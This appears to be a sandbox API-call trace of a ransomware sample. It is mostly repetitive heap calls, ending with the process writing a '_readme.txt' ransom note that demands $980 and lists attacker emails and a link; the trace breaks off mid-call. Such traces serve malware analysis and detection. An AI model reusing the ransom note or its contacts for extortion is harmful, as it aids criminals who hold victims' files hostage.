[0142.805] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x9aaf2b8 | out: hHeap=0x620000) returned 1 [0142.805] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x9ac21a8 | out: hHeap=0x620000) returned 1 [0142.805] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x9ac21a8 [0142.805] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x9aaf2b8 [0142.805] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x9aaf2b8 | out: hHeap=0x620000) returned 1 [0142.805] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x9ac21a8 | out: hHeap=0x620000) returned 1 [0142.805] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x9ac21a8 [0142.805] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x9aaf2b8 [0142.805] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x9aaf2b8 | out: hHeap=0x620000) returned 1 [0142.805] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x9ac21a8 | out: hHeap=0x620000) returned 1 [0142.805] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x9ac21a8 [0142.805] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x9aaf2b8 [0142.805] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc46) returned 0x325d510 [0142.805] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x9aaf2b8 | out: hHeap=0x620000) returned 1 [0142.805] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x325d510 | out: hHeap=0x620000) returned 1 [0142.805] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x9ac21a8 | out: hHeap=0x620000) returned 1 [0142.805] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x9ac21a8 [0142.805] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x9aaf2b8 [0142.805] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x9aaf2b8 | out: hHeap=0x620000) returned 1 [0142.805] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x9ac21a8 | out: hHeap=0x620000) returned 1 [0142.805] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x9ac21a8 [0142.805] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x9aaf2b8 [0142.805] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc2e) returned 0x325d510 [0142.805] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x9aaf2b8 | out: hHeap=0x620000) returned 1 [0142.805] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x325d510 | out: hHeap=0x620000) returned 1 [0142.805] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x9ac21a8 | out: hHeap=0x620000) returned 1 [0142.805] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x9ac21a8 [0142.805] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x860) returned 0x3221ae8 [0142.805] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3221ae8 | out: hHeap=0x620000) returned 1 [0142.805] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x9ac21a8 | out: hHeap=0x620000) returned 1 [0142.806] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x9ac21a8 [0142.806] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x860) returned 0x3221ae8 [0142.806] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3221ae8 | out: hHeap=0x620000) returned 1 [0142.806] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x9ac21a8 | out: hHeap=0x620000) returned 1 [0142.806] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x9ac21a8 [0142.806] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x9aaf2b8 [0142.806] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x9aaf2b8 | out: hHeap=0x620000) returned 1 [0142.806] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x9ac21a8 | out: hHeap=0x620000) returned 1 [0142.806] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x9ac21a8 [0142.806] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x9aaf2b8 [0142.806] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x9aaf2b8 | out: hHeap=0x620000) returned 1 [0142.806] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x9ac21a8 | out: hHeap=0x620000) returned 1 [0142.806] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x9ac21a8 [0142.806] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x9aaf2b8 [0142.806] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc46) returned 0x325d510 [0142.806] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x9aaf2b8 | out: hHeap=0x620000) returned 1 [0142.806] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x325d510 | out: hHeap=0x620000) returned 1 [0142.806] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x9ac21a8 | out: hHeap=0x620000) returned 1 [0142.806] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x9ac21a8 [0142.806] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x840) returned 0x9aaf2b8 [0142.806] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x9aaf2b8 | out: hHeap=0x620000) returned 1 [0142.806] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x9ac21a8 | out: hHeap=0x620000) returned 1 [0142.806] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x9ac21a8 [0142.806] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x840) returned 0x9aaf2b8 [0142.806] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x9aaf2b8 | out: hHeap=0x620000) returned 1 [0142.806] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x9ac21a8 | out: hHeap=0x620000) returned 1 [0142.806] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x9ac21a8 [0142.806] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x9aaf2b8 [0142.806] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x9aaf2b8 | out: hHeap=0x620000) returned 1 [0142.806] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x9ac21a8 | out: hHeap=0x620000) returned 1 [0142.806] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x9ac21a8 [0142.806] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x9aaf2b8 [0142.806] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x9aaf2b8 | out: hHeap=0x620000) returned 1 [0142.806] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x9ac21a8 | out: hHeap=0x620000) returned 1 [0142.806] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x9ac21a8 [0142.806] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x9aaf2b8 [0142.807] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x9aaf2b8 | out: hHeap=0x620000) returned 1 [0142.807] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x9ac21a8 | out: hHeap=0x620000) returned 1 [0142.807] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x9ac21a8 [0142.807] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x9aaf2b8 [0142.807] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x9aaf2b8 | out: hHeap=0x620000) returned 1 [0142.807] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x9ac21a8 | out: hHeap=0x620000) returned 1 [0142.807] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x9ac21a8 [0142.807] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x9aaf2b8 [0142.807] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x9aaf2b8 | out: hHeap=0x620000) returned 1 [0142.807] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x9ac21a8 | out: hHeap=0x620000) returned 1 [0142.807] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x9ac21a8 [0142.807] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x9aaf2b8 [0142.807] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x9aaf2b8 | out: hHeap=0x620000) returned 1 [0142.807] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x9ac21a8 | out: hHeap=0x620000) returned 1 [0142.807] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x9ac21a8 [0142.807] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x9aaf2b8 [0142.807] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x9aaf2b8 | out: hHeap=0x620000) returned 1 [0142.807] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x9ac21a8 | out: hHeap=0x620000) returned 1 [0142.807] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x9ac21a8 [0142.807] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x9aaf2b8 [0142.807] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc46) returned 0x325d510 [0142.807] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x9aaf2b8 | out: hHeap=0x620000) returned 1 [0142.807] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x325d510 | out: hHeap=0x620000) returned 1 [0142.807] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x9ac21a8 | out: hHeap=0x620000) returned 1 [0142.807] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x9ac21a8 [0142.807] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x9aaf2b8 [0142.807] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x9aaf2b8 | out: hHeap=0x620000) returned 1 [0142.807] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x9ac21a8 | out: hHeap=0x620000) returned 1 [0142.807] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x9ac21a8 [0142.807] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x860) returned 0x3221ae8 [0142.807] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3221ae8 | out: hHeap=0x620000) returned 1 [0142.807] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x9ac21a8 | out: hHeap=0x620000) returned 1 [0142.807] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x9ac21a8 [0142.807] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x860) returned 0x3221ae8 [0142.807] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3221ae8 | out: hHeap=0x620000) returned 1 [0142.807] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x9ac21a8 | out: hHeap=0x620000) returned 1 [0142.807] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x9ac21a8 [0142.807] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x9aaf2b8 [0142.808] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x9aaf2b8 | out: hHeap=0x620000) returned 1 [0142.808] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x9ac21a8 | out: hHeap=0x620000) returned 1 [0142.808] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x9ac21a8 [0142.808] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x9aaf2b8 [0142.808] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x9aaf2b8 | out: hHeap=0x620000) returned 1 [0142.808] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x9ac21a8 | out: hHeap=0x620000) returned 1 [0142.808] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x9ac21a8 [0142.808] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x9aaf2b8 [0142.808] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc46) returned 0x325d510 [0142.808] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x9aaf2b8 | out: hHeap=0x620000) returned 1 [0142.808] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x325d510 | out: hHeap=0x620000) returned 1 [0142.808] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x9ac21a8 | out: hHeap=0x620000) returned 1 [0142.808] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x9ac21a8 [0142.808] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x840) returned 0x9aaf2b8 [0142.808] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x9aaf2b8 | out: hHeap=0x620000) returned 1 [0142.808] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x9ac21a8 | out: hHeap=0x620000) returned 1 [0142.808] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x9ac21a8 [0142.808] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x840) returned 0x9aaf2b8 [0142.808] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x9aaf2b8 | out: hHeap=0x620000) returned 1 [0142.808] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x9ac21a8 | out: hHeap=0x620000) returned 1 [0142.808] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x9ac21a8 [0142.808] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x9aaf2b8 [0142.808] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x9aaf2b8 | out: hHeap=0x620000) returned 1 [0142.808] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x9ac21a8 | out: hHeap=0x620000) returned 1 [0142.808] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x9ac21a8 [0142.808] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x9aaf2b8 [0142.808] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x9aaf2b8 | out: hHeap=0x620000) returned 1 [0142.808] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x9ac21a8 | out: hHeap=0x620000) returned 1 [0142.808] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x9ac21a8 [0142.808] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x9aaf2b8 [0142.808] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x9aaf2b8 | out: hHeap=0x620000) returned 1 [0142.808] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x9ac21a8 | out: hHeap=0x620000) returned 1 [0142.808] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x9ac21a8 [0142.808] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x9aaf2b8 [0142.808] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x9aaf2b8 | out: hHeap=0x620000) returned 1 [0142.808] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x9ac21a8 | out: hHeap=0x620000) returned 1 [0142.808] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x9ac21a8 [0142.809] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x9aaf2b8 [0142.809] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x9aaf2b8 | out: hHeap=0x620000) returned 1 [0142.809] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x9ac21a8 | out: hHeap=0x620000) returned 1 [0142.809] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x9ac21a8 [0142.809] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x9aaf2b8 [0142.809] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x9aaf2b8 | out: hHeap=0x620000) returned 1 [0142.809] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x9ac21a8 | out: hHeap=0x620000) returned 1 [0142.809] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x9ac21a8 [0142.809] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x9aaf2b8 [0142.809] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x9aaf2b8 | out: hHeap=0x620000) returned 1 [0142.809] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x9ac21a8 | out: hHeap=0x620000) returned 1 [0142.809] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x9ac21a8 [0142.809] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x9aaf2b8 [0142.809] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc46) returned 0x325d510 [0142.809] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x9aaf2b8 | out: hHeap=0x620000) returned 1 [0142.809] PathFindFileNameW (pszPath="C:\\Boot\\ko-KR\\") returned="ko-KR\\" [0142.809] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x9ac1898 [0142.809] PathFindFileNameW (pszPath="C:\\Boot\\") returned="Boot\\" [0142.809] PathFindFileNameW (pszPath="C:\\") returned="C:\\" [0142.809] PathFindFileNameW (pszPath="") returned="" [0142.809] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x9ac1898 [0142.809] LoadLibraryW (lpLibFileName="Shell32.dll") returned 0x759d0000 [0142.810] GetProcAddress (hModule=0x759d0000, lpProcName="SHGetFolderPathW") returned 0x75a55708 [0142.810] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x800) returned 0x3221ae8 [0142.810] SHGetFolderPathW (in: hwnd=0x0, csidl=40, hToken=0x0, dwFlags=0x0, pszPath=0x3221ae8 | out: pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz") returned 0x0 [0142.810] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x810) returned 0x9aaf2b8 [0142.810] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x9ac21a8 [0142.810] FreeLibrary (hLibModule=0x759d0000) returned 1 [0142.810] PathAppendW (in: pszPath="C:\\Boot\\ko-KR\\", pMore="_readme.txt" | out: pszPath="C:\\Boot\\ko-KR\\_readme.txt") returned 1 [0142.810] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x9aafb40 [0142.810] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x9ac1cf8 | out: hHeap=0x620000) returned 1 [0142.810] PathFileExistsW (pszPath="C:\\Boot\\ko-KR\\_readme.txt") returned 0 [0142.811] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x7d00) returned 0x9ad6f98 [0142.811] lstrcpyW (in: lpString1=0x9ad6f98, lpString2="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like photos, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-xcn1Dtzak4\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nhelpmanager@mail.ch\r\n\r\nReserve e-mail address to contact us:\r\nrestoremanager@firemail.cc\r\n\r\nYour personal ID:\r\n0224yiuduy6S5d" | out: lpString1="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like photos, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-xcn1Dtzak4\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nhelpmanager@mail.ch\r\n\r\nReserve e-mail address to contact us:\r\nrestoremanager@firemail.cc\r\n\r\nYour personal ID:\r\n0224yiuduy6S5d") returned="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like photos, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-xcn1Dtzak4\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nhelpmanager@mail.ch\r\n\r\nReserve e-mail address to contact us:\r\nrestoremanager@firemail.cc\r\n\r\nYour personal ID:\r\n0224yiuduy6S5d" [0142.811] lstrcatW (in: lpString1="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like photos, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-xcn1Dtzak4\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nhelpmanager@mail.ch\r\n\r\nReserve e-mail address to contact us:\r\nrestoremanager@firemail.cc\r\n\r\nYour personal ID:\r\n0224yiuduy6S5d", lpString2="9UR8CEfVlhGJx3jwwXdVqZ3owpwVZwN7BjVbRUSR" | out: lpString1="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like photos, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-xcn1Dtzak4\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nhelpmanager@mail.ch\r\n\r\nReserve e-mail address to contact us:\r\nrestoremanager@firemail.cc\r\n\r\nYour personal ID:\r\n0224yiuduy6S5d9UR8CEfVlhGJx3jwwXdVqZ3owpwVZwN7BjVbRUSR") returned="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like photos, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-xcn1Dtzak4\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nhelpmanager@mail.ch\r\n\r\nReserve e-mail address to contact us:\r\nrestoremanager@firemail.cc\r\n\r\nYour personal ID:\r\n0224yiuduy6S5d9UR8CEfVlhGJx3jwwXdVqZ3owpwVZwN7BjVbRUSR" [0142.811] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x9ab03c8 [0142.811] CreateFileW (lpFileName="C:\\Boot\\ko-KR\\_readme.txt" (normalized: "c:\\boot\\ko-kr\\_readme.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x6f0 [0142.812] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x8c0) returned 0x3221ae8 [0142.812] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x85b) returned 0x325d510 [0142.812] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like photos, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-xcn1Dtzak4\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nhelpmanager@mail.ch\r\n\r\nReserve e-mail address to contact us:\r\nrestoremanager@firemail.cc\r\n\r\nYour personal ID:\r\n0224yiuduy6S5d9UR8CEfVlhGJx3jwwXdVqZ3owpwVZwN7BjVbRUSR", cchWideChar=-1, lpMultiByteStr=0x325d510, cbMultiByte=2139, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like photos, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-xcn1Dtzak4\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nhelpmanager@mail.ch\r\n\r\nReserve e-mail address to contact us:\r\nrestoremanager@firemail.cc\r\n\r\nYour personal ID:\r\n0224yiuduy6S5d9UR8CEfVlhGJx3jwwXdVqZ3owpwVZwN7BjVbRUSR", lpUsedDefaultChar=0x0) returned 